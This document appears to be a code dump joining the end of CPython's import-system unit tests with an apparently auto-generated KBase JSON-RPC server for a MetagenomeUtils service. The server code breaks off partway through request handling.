mod = self.import_module()
self.assertEqual(mod.module_filename, pyc_file)
self.assertEqual(mod.code_filename, target)
self.assertEqual(mod.func_filename, target)
def test_foreign_code(self):
py_compile.compile(self.file_name)
with open(self.compiled_name, "rb") as f:
header = f.read(16)
code = marshal.load(f)
constants = list(code.co_consts)
foreign_code = importlib.import_module.__code__
pos = constants.index(1)
constants[pos] = foreign_code
code = type(code)(code.co_argcount, code.co_posonlyargcount,
code.co_kwonlyargcount,
code.co_nlocals, code.co_stacksize,
code.co_flags, code.co_code, tuple(constants),
code.co_names, code.co_varnames, code.co_filename,
code.co_name, code.co_firstlineno, code.co_lnotab,
code.co_freevars, code.co_cellvars)
with open(self.compiled_name, "wb") as f:
f.write(header)
marshal.dump(code, f)
mod = self.import_module()
self.assertEqual(mod.constant.co_filename, foreign_code.co_filename)
class PathsTests(unittest.TestCase):
SAMPLES = ('test', 'test\u00e4\u00f6\u00fc\u00df', 'test\u00e9\u00e8',
'test\u00b0\u00b3\u00b2')
path = TESTFN
def setUp(self):
os.mkdir(self.path)
self.syspath = sys.path[:]
def tearDown(self):
rmtree(self.path)
sys.path[:] = self.syspath
# Regression test for http://bugs.python.org/issue1293.
def test_trailing_slash(self):
with open(os.path.join(self.path, 'test_trailing_slash.py'), 'w') as f:
f.write("testdata = 'test_trailing_slash'")
sys.path.append(self.path+'/')
mod = __import__("test_trailing_slash")
self.assertEqual(mod.testdata, 'test_trailing_slash')
unload("test_trailing_slash")
# Regression test for http://bugs.python.org/issue3677.
@unittest.skipUnless(sys.platform == 'win32', 'Windows-specific')
def test_UNC_path(self):
with open(os.path.join(self.path, 'test_unc_path.py'), 'w') as f:
f.write("testdata = 'test_unc_path'")
importlib.invalidate_caches()
# Create the UNC path, like \\myhost\c$\foo\bar.
path = os.path.abspath(self.path)
import socket
hn = socket.gethostname()
drive = path[0]
unc = "\\\\%s\\%s$"%(hn, drive)
unc += path[2:]
try:
os.listdir(unc)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.ENOENT):
# See issue #15338
self.skipTest("cannot access administrative share %r" % (unc,))
raise
sys.path.insert(0, unc)
try:
mod = __import__("test_unc_path")
except ImportError as e:
self.fail("could not import 'test_unc_path' from %r: %r"
% (unc, e))
self.assertEqual(mod.testdata, 'test_unc_path')
self.assertTrue(mod.__file__.startswith(unc), mod.__file__)
unload("test_unc_path")
class RelativeImportTests(unittest.TestCase):
def tearDown(self):
unload("test.relimport")
setUp = tearDown
def test_relimport_star(self):
# This will import * from .test_import.
from .. import relimport
self.assertTrue(hasattr(relimport, "RelativeImportTests"))
def test_issue3221(self):
# Note for mergers: the 'absolute' tests from the 2.x branch
# are missing in Py3k because implicit relative imports are
# a thing of the past
#
# Regression test for http://bugs.python.org/issue3221.
def check_relative():
exec("from . import relimport", ns)
# Check relative import OK with __package__ and __name__ correct
ns = dict(__package__='test', __name__='test.notarealmodule')
check_relative()
# Check relative import OK with only __name__ wrong
ns = dict(__package__='test', __name__='notarealpkg.notarealmodule')
check_relative()
# Check relative import fails with only __package__ wrong
ns = dict(__package__='foo', __name__='test.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with __package__ and __name__ wrong
ns = dict(__package__='foo', __name__='notarealpkg.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with package set to a non-string
ns = dict(__package__=object())
self.assertRaises(TypeError, check_relative)
def test_absolute_import_without_future(self):
# If explicit relative import syntax is used, then do not try
# to perform an absolute import in the face of failure.
# Issue #7902.
with self.assertRaises(ImportError):
from .os import sep
self.fail("explicit relative import triggered an "
"implicit absolute import")
def test_import_from_non_package(self):
path = os.path.join(os.path.dirname(__file__), 'data', 'package2')
with uncache('submodule1', 'submodule2'), DirsOnSysPath(path):
with self.assertRaises(ImportError):
import submodule1
self.assertNotIn('submodule1', sys.modules)
self.assertNotIn('submodule2', sys.modules)
def test_import_from_unloaded_package(self):
with uncache('package2', 'package2.submodule1', 'package2.submodule2'), \
DirsOnSysPath(os.path.join(os.path.dirname(__file__), 'data')):
import package2.submodule1
package2.submodule1.submodule2
class OverridingImportBuiltinTests(unittest.TestCase):
def test_override_builtin(self):
# Test that overriding builtins.__import__ can bypass sys.modules.
import os
def foo():
import os
return os
self.assertEqual(foo(), os) # Quick sanity check.
with swap_attr(builtins, "__import__", lambda *x: 5):
self.assertEqual(foo(), 5)
# Test what happens when we shadow __import__ in globals(); this
# currently does not impact the import process, but if this changes,
# other code will need to change, so keep this test as a tripwire.
with swap_item(globals(), "__import__", lambda *x: 5):
self.assertEqual(foo(), os)
class PycacheTests(unittest.TestCase):
# Test the various PEP 3147/488-related behaviors.
def _clean(self):
forget(TESTFN)
rmtree('__pycache__')
unlink(self.source)
def setUp(self):
self.source = TESTFN + '.py'
self._clean()
with open(self.source, 'w') as fp:
print('# This is a test file written by test_import.py', file=fp)
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
def tearDown(self):
assert sys.path[0] == os.curdir, 'Unexpected sys.path[0]'
del sys.path[0]
self._clean()
@skip_if_dont_write_bytecode
def test_import_pyc_path(self):
self.assertFalse(os.path.exists('__pycache__'))
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} does not '
'exist'.format(pyc_path, TESTFN))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"due to varying filesystem permission semantics (issue #11956)")
@skip_if_dont_write_bytecode
def test_unwritable_directory(self):
# When the umask causes the new __pycache__ directory to be
# unwritable, the import still succeeds but no .pyc file is written.
with temp_umask(0o222):
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertFalse(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} '
'exists'.format(pyc_path, TESTFN))
@skip_if_dont_write_bytecode
def test_missing_source(self):
# With PEP 3147 cache layout, removing the source but leaving the pyc
# file does not satisfy the import.
__import__(TESTFN)
pyc_file = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_file))
os.remove(self.source)
forget(TESTFN)
importlib.invalidate_caches()
self.assertRaises(ImportError, __import__, TESTFN)
@skip_if_dont_write_bytecode
def test_missing_source_legacy(self):
# Like test_missing_source() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __file__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
try:
self.assertEqual(m.__file__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
finally:
os.remove(pyc_file)
def test___cached__(self):
# Modules now also have an __cached__ that points to the pyc file.
m = __import__(TESTFN)
pyc_file = importlib.util.cache_from_source(TESTFN + '.py')
self.assertEqual(m.__cached__, os.path.join(os.curdir, pyc_file))
@skip_if_dont_write_bytecode
def test___cached___legacy_pyc(self):
# Like test___cached__() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __cached__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
self.assertEqual(m.__cached__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
@skip_if_dont_write_bytecode
def test_package___cached__(self):
# Like test___cached__ but for packages.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_package___cached___from_pyc(self):
# Like test___cached__ but ensuring __cached__ when imported from a
# PEP 3147 pyc file.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
unload('pep3147.foo')
unload('pep3147')
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_recompute_pyc_same_second(self):
# Even when the source file doesn't change timestamp, a change in
# source size is enough to trigger recomputation of the pyc file.
__import__(TESTFN)
unload(TESTFN)
with open(self.source, 'a') as fp:
print("x = 5", file=fp)
m = __import__(TESTFN)
self.assertEqual(m.x, 5)
class TestSymbolicallyLinkedPackage(unittest.TestCase):
package_name = 'sample'
tagged = package_name + '-tagged'
def setUp(self):
test.support.rmtree(self.tagged)
test.support.rmtree(self.package_name)
self.orig_sys_path = sys.path[:]
# create a sample package; imagine you have a package with a tag and
# you want to symbolically link it from its untagged name.
os.mkdir(self.tagged)
self.addCleanup(test.support.rmtree, self.tagged)
init_file = os.path.join(self.tagged, '__init__.py')
test.support.create_empty_file(init_file)
assert os.path.exists(init_file)
# now create a symlink to the tagged package
# sample -> sample-tagged
os.symlink(self.tagged, self.package_name, target_is_directory=True)
self.addCleanup(test.support.unlink, self.package_name)
importlib.invalidate_caches()
self.assertEqual(os.path.isdir(self.package_name), True)
assert os.path.isfile(os.path.join(self.package_name, '__init__.py'))
def tearDown(self):
sys.path[:] = self.orig_sys_path
# regression test for issue6727
@unittest.skipUnless(
not hasattr(sys, 'getwindowsversion')
or sys.getwindowsversion() >= (6, 0),
"Windows Vista or later required")
@test.support.skip_unless_symlink
def test_symlinked_dir_importable(self):
# make sure sample can only be imported from the current directory.
sys.path[:] = ['.']
assert os.path.exists(self.package_name)
assert os.path.exists(os.path.join(self.package_name, '__init__.py'))
# Try to import the package
importlib.import_module(self.package_name)
@cpython_only
class ImportlibBootstrapTests(unittest.TestCase):
# These tests check that importlib is bootstrapped.
def test_frozen_importlib(self):
mod = sys.modules['_frozen_importlib']
self.assertTrue(mod)
def test_frozen_importlib_is_bootstrap(self):
from importlib import _bootstrap
mod = sys.modules['_frozen_importlib']
self.assertIs(mod, _bootstrap)
self.assertEqual(mod.__name__, 'importlib._bootstrap')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap.py'), mod.__file__)
def test_frozen_importlib_external_is_bootstrap_external(self):
from importlib import _bootstrap_external
mod = sys.modules['_frozen_importlib_external']
self.assertIs(mod, _bootstrap_external)
self.assertEqual(mod.__name__, 'importlib._bootstrap_external')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap_external.py'), mod.__file__)
def test_there_can_be_only_one(self):
# Issue #15386 revealed a tricky loophole in the bootstrapping
# This test is technically redundant, since the bug caused importing
# this test module to crash completely, but it helps prove the point
from importlib import machinery
mod = sys.modules['_frozen_importlib']
self.assertIs(machinery.ModuleSpec, mod.ModuleSpec)
@cpython_only
class GetSourcefileTests(unittest.TestCase):
"""Test importlib._bootstrap_external._get_sourcefile() as used by the C API.
    Because of the peculiar requirements placed on this function, the tests are
knowingly whitebox tests.
"""
def test_get_sourcefile(self):
# Given a valid bytecode path, return the path to the corresponding
# source file if it exists.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = True;
path = TESTFN + '.pyc'
expect = TESTFN + '.py'
self.assertEqual(_get_sourcefile(path), expect)
def test_get_sourcefile_no_source(self):
# Given a valid bytecode path without a corresponding source path,
# return the original bytecode path.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = False;
path = TESTFN + '.pyc'
self.assertEqual(_get_sourcefile(path), path)
def test_get_sourcefile_bad_ext(self):
# Given a path with an invalid bytecode extension, return the
# bytecode path passed as the argument.
path = TESTFN + '.bad_ext'
self.assertEqual(_get_sourcefile(path), path)
class ImportTracebackTests(unittest.TestCase):
def setUp(self):
os.mkdir(TESTFN)
self.old_path = sys.path[:]
sys.path.insert(0, TESTFN)
def tearDown(self):
sys.path[:] = self.old_path
rmtree(TESTFN)
def create_module(self, mod, contents, ext=".py"):
fname = os.path.join(TESTFN, mod + ext)
with open(fname, "w") as f:
f.write(contents)
self.addCleanup(unload, mod)
importlib.invalidate_caches()
return fname
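    # Collapse consecutive traceback frames that come from the same file and
    # check that the resulting file list matches the expected patterns in order.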
def assert_traceback(self, tb, files):
deduped_files = []
while tb:
code = tb.tb_frame.f_code
fn = code.co_filename
if not deduped_files or fn != deduped_files[-1]:
deduped_files.append(fn)
tb = tb.tb_next
self.assertEqual(len(deduped_files), len(files), deduped_files)
for fn, pat in zip(deduped_files, files):
self.assertIn(pat, fn)
def test_nonexistent_module(self):
try:
# assertRaises() clears __traceback__
import nonexistent_xyzzy
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__])
def test_nonexistent_module_nested(self):
self.create_module("foo", "import nonexistent_xyzzy")
try:
import foo
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure(self):
self.create_module("foo", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure_nested(self):
self.create_module("foo", "import bar")
self.create_module("bar", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py', 'bar.py'])
# A few more examples from issue #15425
def test_syntax_error(self):
self.create_module("foo", "invalid syntax is invalid")
try:
import foo
except SyntaxError as e:
tb = e.__traceback__
else:
self.fail("SyntaxError should have been raised")
self.assert_traceback(tb, [__file__])
def _setup_broken_package(self, parent, child):
pkg_name = "_parent_foo"
self.addCleanup(unload, pkg_name)
pkg_path = os.path.join(TESTFN, pkg_name)
os.mkdir(pkg_path)
# Touch the __init__.py
init_path = os.path.join(pkg_path, '__init__.py')
with open(init_path, 'w') as f:
f.write(parent)
bar_path = os.path.join(pkg_path, 'bar.py')
with open(bar_path, 'w') as f:
f.write(child)
importlib.invalidate_caches()
return init_path, bar_path
def test_broken_submodule(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_from(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_parent(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
def test_broken_parent_from(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
@cpython_only
def test_import_bug(self):
# We simulate a bug in importlib and check that it's not stripped
# away from the traceback.
self.create_module("foo", "")
importlib = sys.modules['_frozen_importlib_external']
if 'load_module' in vars(importlib.SourceLoader):
old_exec_module = importlib.SourceLoader.exec_module
else:
old_exec_module = None
try:
def exec_module(*args):
1/0
importlib.SourceLoader.exec_module = exec_module
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, '<frozen importlib', __file__])
finally:
if old_exec_module is None:
del importlib.SourceLoader.exec_module
else:
importlib.SourceLoader.exec_module = old_exec_module
@unittest.skipUnless(TESTFN_UNENCODABLE, 'need TESTFN_UNENCODABLE')
def test_unencodable_filename(self):
# Issue #11619: The Python parser and the import machinery must not
# encode filenames, especially on Windows
pyname = script_helper.make_script('', TESTFN_UNENCODABLE, 'pass')
self.addCleanup(unlink, pyname)
name = pyname[:-3]
script_helper.assert_python_ok("-c", "mod = __import__(%a)" % name,
__isolated=False)
class CircularImportTests(unittest.TestCase):
"""See the docstrings of the modules being imported for the purpose of the
test."""
def tearDown(self):
"""Make sure no modules pre-exist in sys.modules which are being used to
test."""
for key in list(sys.modules.keys()):
if key.startswith('test.test_import.data.circular_imports'):
del sys.modules[key]
def test_direct(self):
try:
import test.test_import.data.circular_imports.basic
except ImportError:
self.fail('circular import through relative imports failed')
def test_indirect(self):
try:
import test.test_import.data.circular_imports.indirect
except ImportError:
self.fail('relative import in module contributing to circular '
'import failed')
def test_subpackage(self):
try:
import test.test_import.data.circular_imports.subpackage
except ImportError:
self.fail('circular import involving a subpackage failed')
def test_rebinding(self):
try:
import test.test_import.data.circular_imports.rebinding as rebinding
except ImportError:
self.fail('circular import with rebinding of module attribute failed')
from test.test_import.data.circular_imports.subpkg import util
self.assertIs(util.util, rebinding.util)
def test_binding(self):
try:
import test.test_import.data.circular_imports.binding
except ImportError:
self.fail('circular import with binding a submodule to a name failed')
def test_crossreference1(self):
import test.test_import.data.circular_imports.use
import test.test_import.data.circular_imports.source
def test_crossreference2(self):
with self.assertRaises(AttributeError) as cm:
import test.test_import.data.circular_imports.source
errmsg = str(cm.exception)
self.assertIn('test.test_import.data.circular_imports.source', errmsg)
self.assertIn('spam', errmsg)
self.assertIn('partially initialized module', errmsg)
self.assertIn('circular import', errmsg)
if __name__ == '__main__':
# Test needs to be a package, so we can do relative imports.
unittest.main()
|
MetagenomeUtilsServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from MetagenomeUtils.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'MetagenomeUtils'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from MetagenomeUtils.MetagenomeUtilsImpl import MetagenomeUtils # noqa @IgnorePep8
impl_MetagenomeUtils = MetagenomeUtils(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
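# Per-call context object passed as the first argument to every service
# method; it carries client/auth information, logging helpers and the call's
# provenance.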
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
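# Resolve the client address, preferring the X-Forwarded-For / X-Real-IP
# headers unless the configuration explicitly marks them as untrusted.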
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'MetagenomeUtils'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_MetagenomeUtils.file_to_binned_contigs,
name='MetagenomeUtils.file_to_binned_contigs',
types=[dict])
self.method_authentication['MetagenomeUtils.file_to_binned_contigs'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.binned_contigs_to_file,
name='MetagenomeUtils.binned_contigs_to_file',
types=[dict])
self.method_authentication['MetagenomeUtils.binned_contigs_to_file'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.export_binned_contigs_as_excel,
name='MetagenomeUtils.export_binned_contigs_as_excel',
types=[dict])
self.method_authentication['MetagenomeUtils.export_binned_contigs_as_excel'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.import_excel_as_binned_contigs,
name='MetagenomeUtils.import_excel_as_binned_contigs',
types=[dict])
self.method_authentication['MetagenomeUtils.import_excel_as_binned_contigs'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.extract_binned_contigs_as_assembly,
name='MetagenomeUtils.extract_binned_contigs_as_assembly',
types=[dict])
self.method_authentication['MetagenomeUtils.extract_binned_contigs_as_assembly'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.remove_bins_from_binned_contig,
name='MetagenomeUtils.remove_bins_from_binned_contig',
types=[dict])
self.method_authentication['MetagenomeUtils.remove_bins_from_binned_contig'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.merge_bins_from_binned_contig,
name='MetagenomeUtils.merge_bins_from_binned_contig',
types=[dict])
self.method_authentication['MetagenomeUtils.merge_bins_from_binned_contig'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.edit_bins_from_binned_contig,
name='MetagenomeUtils.edit_bins_from_binned_contig',
types=[dict])
self.method_authentication['MetagenomeUtils.edit_bins_from_binned_contig'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.get_annotated_metagenome_assembly,
name='MetagenomeUtils.get_annotated_metagenome_assembly',
types=[dict])
self.method_authentication['MetagenomeUtils.get_annotated_metagenome_assembly'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.get_annotated_metagenome_assembly_features,
name='MetagenomeUtils.get_annotated_metagenome_assembly_features',
types=[dict])
self.method_authentication['MetagenomeUtils.get_annotated_metagenome_assembly_features'] = 'required' # noqa
self.rpc_service.add(impl_MetagenomeUtils.status,
name='MetagenomeUtils.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'MetagenomeUtils ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
